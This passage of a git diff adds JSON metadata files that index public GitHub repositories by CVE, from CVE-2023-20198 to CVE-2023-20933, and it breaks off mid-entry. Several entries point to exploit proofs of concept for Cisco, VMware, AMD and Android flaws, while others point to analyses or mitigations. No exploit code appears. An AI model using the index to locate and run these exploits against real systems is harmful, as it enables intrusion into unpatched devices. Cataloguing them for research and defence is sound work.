"subscribers_count": 1 + }, + { + "id": 856822730, + "name": "Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-", + "full_name": "AhmedMansour93\/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-", + "description": "🚨 Just completed a detailed investigation for Event ID 193: \"SOC231 - Cisco IOS XE Web UI ZeroDay (CVE-2023-20198)\" via @LetsDefend.io. The attacker successfully bypassed authentication, gaining admin control over the device! Immediate containment was critical. Stay vigilant! 💻🔐", + "fork": false, + "created_at": "2024-09-13T09:17:49Z", + "updated_at": "2024-09-13T09:18:45Z", + "pushed_at": "2024-09-13T09:18:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892414102, + "name": "cve-2023-20198-poc", + "full_name": "XiaomingX\/cve-2023-20198-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2023-20198-poc", + "description": "CVE-2023-20198是思科IOS XE软件Web UI功能中的一个严重漏洞,允许未经身份验证的远程攻击者在受影响的系统上创建具有特权级别15的账户,从而完全控制设备。", + "fork": false, + "created_at": "2024-11-22T04:10:28Z", + "updated_at": "2024-12-10T03:08:29Z", + "pushed_at": "2024-11-22T04:12:11Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20209.json b/2023/CVE-2023-20209.json new file mode 100644 index 0000000000..a0e81687e2 --- /dev/null +++ b/2023/CVE-2023-20209.json @@ -0,0 +1,33 @@ +[ + { + "id": 697854392, + "name": "CVE-2023-20209", + "full_name": "peter5he1by\/CVE-2023-20209", + "owner": { + "login": "peter5he1by", + "id": 86906331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86906331?v=4", + "html_url": "https:\/\/github.com\/peter5he1by", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/peter5he1by\/CVE-2023-20209", + "description": null, + "fork": false, + "created_at": "2023-09-28T15:55:22Z", + "updated_at": "2023-10-05T10:57:42Z", + "pushed_at": "2023-09-27T09:38:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2023.json b/2023/CVE-2023-2023.json new file mode 100644 index 0000000000..93ba868bdd --- /dev/null +++ b/2023/CVE-2023-2023.json @@ -0,0 +1,64 @@ +[ + { + "id": 679185431, + "name": "Hvv2023", + "full_name": "thatformat\/Hvv2023", + "owner": { + "login": "thatformat", + "id": 46617017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46617017?v=4", + "html_url": "https:\/\/github.com\/thatformat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thatformat\/Hvv2023", + "description": "HW2023@POC@EXP@CVE-2023-2023", + "fork": false, + "created_at": "2023-08-16T09:30:24Z", + "updated_at": "2024-07-02T05:49:56Z", + "pushed_at": "2023-08-16T08:17:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 758110379, + "name": "PHP-CVE-2023-2023-2640-POC-Escalation", + "full_name": "druxter-x\/PHP-CVE-2023-2023-2640-POC-Escalation", + "owner": { + "login": "druxter-x", + "id": 1912258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1912258?v=4", + "html_url": "https:\/\/github.com\/druxter-x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/druxter-x\/PHP-CVE-2023-2023-2640-POC-Escalation", + "description": null, + "fork": false, + "created_at": "2024-02-15T16:35:59Z", + "updated_at": "2024-02-15T16:39:41Z", + "pushed_at": "2024-02-15T17:10:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2024.json b/2023/CVE-2023-2024.json new file mode 100644 index 0000000000..983da9d854 --- /dev/null +++ b/2023/CVE-2023-2024.json @@ -0,0 +1,33 @@ +[ + { + "id": 727309635, + "name": "CVE-2023-2024", + "full_name": "team890\/CVE-2023-2024", + "owner": { + "login": "team890", + "id": 138309416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138309416?v=4", + "html_url": "https:\/\/github.com\/team890", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/team890\/CVE-2023-2024", + "description": "For Aina", + "fork": false, + "created_at": "2023-12-04T15:55:22Z", + "updated_at": "2024-11-12T14:57:40Z", + "pushed_at": "2024-05-30T11:28:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20273.json b/2023/CVE-2023-20273.json new file mode 100644 index 0000000000..cf2db79d02 --- /dev/null +++ b/2023/CVE-2023-20273.json @@ -0,0 +1,33 @@ +[ + { + "id": 729425545, + "name": "CVE-2023-20273", + "full_name": "smokeintheshell\/CVE-2023-20273", + "owner": { + "login": "smokeintheshell", + "id": 19311214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19311214?v=4", + "html_url": "https:\/\/github.com\/smokeintheshell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smokeintheshell\/CVE-2023-20273", + "description": "CVE-2023-20273 Exploit PoC", + "fork": false, + "created_at": "2023-12-09T07:25:43Z", + "updated_at": "2024-10-27T00:43:32Z", + "pushed_at": "2024-04-01T18:59:05Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2033.json b/2023/CVE-2023-2033.json new file mode 100644 index 0000000000..e9a205ee88 --- /dev/null +++ b/2023/CVE-2023-2033.json @@ -0,0 +1,162 @@ +[ + { + "id": 628773544, + "name": "CVE-2023-2033", + "full_name": "insoxin\/CVE-2023-2033", + "owner": { + "login": "insoxin", + "id": 19371836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19371836?v=4", + "html_url": "https:\/\/github.com\/insoxin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/insoxin\/CVE-2023-2033", + "description": "Reproduce CVE-2023-2033", + "fork": false, + "created_at": "2023-04-17T00:25:16Z", + "updated_at": "2023-04-25T02:29:27Z", + "pushed_at": "2023-04-19T00:40:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 633007710, + "name": "CVE-2023-2033-Analysis", + "full_name": "sandumjacob\/CVE-2023-2033-Analysis", + "owner": { + "login": "sandumjacob", + "id": 36341780, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36341780?v=4", + "html_url": "https:\/\/github.com\/sandumjacob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sandumjacob\/CVE-2023-2033-Analysis", + "description": "A collection of resources and information about CVE-2023-2033", + "fork": false, + "created_at": "2023-04-26T15:24:02Z", + "updated_at": "2024-07-14T07:43:48Z", + "pushed_at": "2023-08-13T21:53:14Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-2033", + "exploitation", + "v8", + "v8-javascript-engine" + ], + "visibility": "public", + "forks": 2, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634395831, + "name": "CVE-2023-2033-analysis", + "full_name": "gretchenfrage\/CVE-2023-2033-analysis", + "owner": { + "login": "gretchenfrage", + "id": 14357474, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14357474?v=4", + "html_url": "https:\/\/github.com\/gretchenfrage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gretchenfrage\/CVE-2023-2033-analysis", + "description": null, + "fork": false, + "created_at": "2023-04-30T01:18:25Z", + "updated_at": "2023-04-30T01:18:26Z", + "pushed_at": "2023-04-30T01:18:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 673776946, + "name": "CVE-2023-2033", + "full_name": "mistymntncop\/CVE-2023-2033", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2023-2033", + "description": null, + "fork": false, + "created_at": "2023-08-02T11:55:30Z", + "updated_at": "2024-10-24T07:34:42Z", + "pushed_at": "2023-08-15T03:31:13Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 63, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 679512175, + "name": "CVE-2023-2033", + "full_name": "tianstcht\/CVE-2023-2033", + "owner": { + "login": "tianstcht", + "id": 32213198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32213198?v=4", + "html_url": "https:\/\/github.com\/tianstcht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tianstcht\/CVE-2023-2033", + "description": null, + "fork": false, + "created_at": "2023-08-17T02:40:42Z", + "updated_at": "2023-08-17T02:40:43Z", + "pushed_at": "2023-08-17T02:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20562.json b/2023/CVE-2023-20562.json new file mode 100644 index 0000000000..6a7d27a599 --- /dev/null +++ b/2023/CVE-2023-20562.json @@ -0,0 +1,64 @@ +[ + { + "id": 680961189, + "name": "HITCON-2023-Demo-CVE-2023-20562", + "full_name": "zeze-zeze\/HITCON-2023-Demo-CVE-2023-20562", + "owner": { + "login": "zeze-zeze", + "id": 33378686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33378686?v=4", + "html_url": "https:\/\/github.com\/zeze-zeze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeze-zeze\/HITCON-2023-Demo-CVE-2023-20562", + "description": null, + "fork": false, + "created_at": "2023-08-21T00:31:50Z", + "updated_at": "2024-11-15T16:48:15Z", + "pushed_at": "2023-08-21T00:33:08Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 57, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 681042384, + "name": "HITCON-2023-Demo-CVE-2023-20562", + "full_name": "passwa11\/HITCON-2023-Demo-CVE-2023-20562", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/HITCON-2023-Demo-CVE-2023-20562", + "description": null, + "fork": false, + "created_at": "2023-08-21T06:25:09Z", + "updated_at": "2024-01-12T02:38:02Z", + "pushed_at": "2023-08-21T06:25:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20573.json b/2023/CVE-2023-20573.json new file mode 100644 index 0000000000..f6c84a3c58 --- /dev/null +++ b/2023/CVE-2023-20573.json @@ -0,0 +1,33 @@ +[ + { + "id": 612644234, + "name": "cve-2023-20573-poc", + "full_name": "Freax13\/cve-2023-20573-poc", + "owner": { + "login": "Freax13", + "id": 14952658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14952658?v=4", + "html_url": "https:\/\/github.com\/Freax13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Freax13\/cve-2023-20573-poc", + "description": null, + "fork": false, + "created_at": "2023-03-11T15:04:51Z", + "updated_at": "2024-12-12T17:05:08Z", + "pushed_at": "2024-01-09T21:11:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20593.json b/2023/CVE-2023-20593.json new file mode 100644 index 0000000000..e5f790da4a --- /dev/null +++ b/2023/CVE-2023-20593.json @@ -0,0 +1,37 @@ +[ + { + "id": 671214196, + "name": "stop-zenbleed-win", + "full_name": "sbaresearch\/stop-zenbleed-win", + "owner": { + "login": "sbaresearch", + "id": 1678129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1678129?v=4", + "html_url": "https:\/\/github.com\/sbaresearch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sbaresearch\/stop-zenbleed-win", + "description": "PowerShell script to apply Zenbleed (CVE-2023-20593) MSR workaround on Windows", + "fork": false, + "created_at": "2023-07-26T20:03:11Z", + "updated_at": "2023-09-08T12:14:54Z", + "pushed_at": "2023-07-31T09:21:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-20593", + "windows", + "zenbleed" + ], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20598.json b/2023/CVE-2023-20598.json new file mode 100644 index 0000000000..fc483df18b --- /dev/null +++ b/2023/CVE-2023-20598.json @@ -0,0 +1,33 @@ +[ + { + "id": 813857053, + "name": "CVE-2023-20598-PDFWKRNL", + "full_name": "H4rk3nz0\/CVE-2023-20598-PDFWKRNL", + "owner": { + "login": "H4rk3nz0", + "id": 54619779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54619779?v=4", + "html_url": "https:\/\/github.com\/H4rk3nz0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4rk3nz0\/CVE-2023-20598-PDFWKRNL", + "description": "CVE-2023-20598 Kernel Driver - Elevation of Privilege", + "fork": false, + "created_at": "2024-06-11T22:03:51Z", + "updated_at": "2024-11-21T05:21:54Z", + "pushed_at": "2024-06-13T21:34:45Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20860.json b/2023/CVE-2023-20860.json new file mode 100644 index 0000000000..7f156a3d68 --- /dev/null +++ b/2023/CVE-2023-20860.json @@ -0,0 +1,33 @@ +[ + { + "id": 618305558, + "name": "CVE-2023-20860", + "full_name": "limo520\/CVE-2023-20860", + "owner": { + "login": "limo520", + "id": 24580562, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24580562?v=4", + "html_url": "https:\/\/github.com\/limo520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/limo520\/CVE-2023-20860", + "description": null, + "fork": false, + "created_at": "2023-03-24T07:23:52Z", + "updated_at": "2023-12-23T16:06:01Z", + "pushed_at": "2023-03-24T07:42:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20872.json b/2023/CVE-2023-20872.json new file mode 100644 index 0000000000..19a2021923 --- /dev/null +++ b/2023/CVE-2023-20872.json @@ -0,0 +1,33 @@ +[ + { + "id": 830497211, + "name": "vmware-escape-CVE-2023-20872-poc", + "full_name": "ze0r\/vmware-escape-CVE-2023-20872-poc", + "owner": { + "login": "ze0r", + "id": 43227253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43227253?v=4", + "html_url": "https:\/\/github.com\/ze0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ze0r\/vmware-escape-CVE-2023-20872-poc", + "description": null, + "fork": false, + "created_at": "2024-07-18T11:45:30Z", + "updated_at": "2024-12-31T07:55:52Z", + "pushed_at": "2024-07-19T14:01:31Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20887.json b/2023/CVE-2023-20887.json new file mode 100644 index 0000000000..cf248e068a --- /dev/null +++ b/2023/CVE-2023-20887.json @@ -0,0 +1,97 @@ +[ + { + "id": 653133276, + "name": "CVE-2023-20887", + "full_name": "sinsinology\/CVE-2023-20887", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2023-20887", + "description": "VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)", + "fork": false, + "created_at": "2023-06-13T13:17:23Z", + "updated_at": "2024-12-28T13:10:06Z", + "pushed_at": "2023-06-13T14:39:17Z", + "stargazers_count": 232, + "watchers_count": 232, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-20887" + ], + "visibility": "public", + "forks": 45, + "watchers": 232, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 653490431, + "name": "CVE-2023-20887", + "full_name": "miko550\/CVE-2023-20887", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2023-20887", + "description": "VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)", + "fork": false, + "created_at": "2023-06-14T06:50:00Z", + "updated_at": "2024-07-11T06:04:13Z", + "pushed_at": "2023-06-14T06:53:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696042954, + "name": "CVE-2023-20887", + "full_name": "Malwareman007\/CVE-2023-20887", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-20887", + "description": "VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)", + "fork": false, + "created_at": "2023-09-25T00:41:45Z", + "updated_at": "2024-08-10T17:51:51Z", + "pushed_at": "2023-09-25T00:48:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20909.json b/2023/CVE-2023-20909.json new file mode 100644 index 0000000000..8e2f469acb --- /dev/null +++ b/2023/CVE-2023-20909.json @@ -0,0 +1,64 @@ +[ + { + "id": 730068512, + "name": "frameworks_base_AOSP10_r33_CVE-2023-20909", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20909", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20909", + "description": null, + "fork": false, + "created_at": "2023-12-11T06:14:11Z", + "updated_at": "2023-12-11T06:20:09Z", + "pushed_at": "2023-12-11T06:35:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730110101, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2023-20909", + "full_name": "Trinadh465\/platform_frameworks_base_AOSP10_r33_CVE-2023-20909", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_AOSP10_r33_CVE-2023-20909", + "description": null, + "fork": false, + "created_at": "2023-12-11T08:23:14Z", + "updated_at": "2023-12-11T08:23:15Z", + "pushed_at": "2023-12-11T08:23:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20911.json b/2023/CVE-2023-20911.json new file mode 100644 index 0000000000..69b36c05ce --- /dev/null +++ b/2023/CVE-2023-20911.json @@ -0,0 +1,33 @@ +[ + { + "id": 721630428, + "name": "frameworks_base_AOSP10_r33_CVE-2023-20911", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20911", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20911", + "description": null, + "fork": false, + "created_at": "2023-11-21T13:05:00Z", + "updated_at": "2023-11-21T13:13:02Z", + "pushed_at": "2023-11-23T05:03:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20918.json b/2023/CVE-2023-20918.json new file mode 100644 index 0000000000..43902260f9 --- /dev/null +++ b/2023/CVE-2023-20918.json @@ -0,0 +1,64 @@ +[ + { + "id": 699801559, + "name": "platform_frameworks_base_AOSP_10_r33_CVE-2023-20918", + "full_name": "pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918", + "description": null, + "fork": false, + "created_at": "2023-10-03T11:21:35Z", + "updated_at": "2023-10-03T11:29:10Z", + "pushed_at": "2023-10-03T11:29:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 699813635, + "name": "platform_frameworks_base_CVE-2023-20918", + "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-20918", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-20918", + "description": null, + "fork": false, + "created_at": "2023-10-03T11:52:16Z", + "updated_at": "2023-10-03T11:59:03Z", + "pushed_at": "2023-10-03T11:58:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20921.json b/2023/CVE-2023-20921.json new file mode 100644 index 0000000000..d34a158f43 --- /dev/null +++ b/2023/CVE-2023-20921.json @@ -0,0 +1,33 @@ +[ + { + "id": 724965419, + "name": "frameworks_base_android-6.0.1_r22_CVE-2023-20921", + "full_name": "Trinadh465\/frameworks_base_android-6.0.1_r22_CVE-2023-20921", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_android-6.0.1_r22_CVE-2023-20921", + "description": null, + "fork": false, + "created_at": "2023-11-29T06:42:43Z", + "updated_at": "2023-11-29T06:50:59Z", + "pushed_at": "2023-11-29T06:50:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20933.json b/2023/CVE-2023-20933.json new file mode 100644 index 0000000000..d7d23fc027 --- /dev/null +++ b/2023/CVE-2023-20933.json @@ -0,0 +1,64 @@ +[ + { + "id": 622830505, + "name": "frameworks_av_CVE-2023-20933", + "full_name": "Trinadh465\/frameworks_av_CVE-2023-20933", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_av_CVE-2023-20933", + "description": null, + "fork": false, + "created_at": "2023-04-03T06:41:47Z", + "updated_at": "2023-04-03T07:03:11Z", + "pushed_at": "2023-04-03T07:04:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623806497, + "name": "platform_frameworks_av_AOSP10_r33_CVE-2023-20933", + "full_name": "hshivhare67\/platform_frameworks_av_AOSP10_r33_CVE-2023-20933", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", 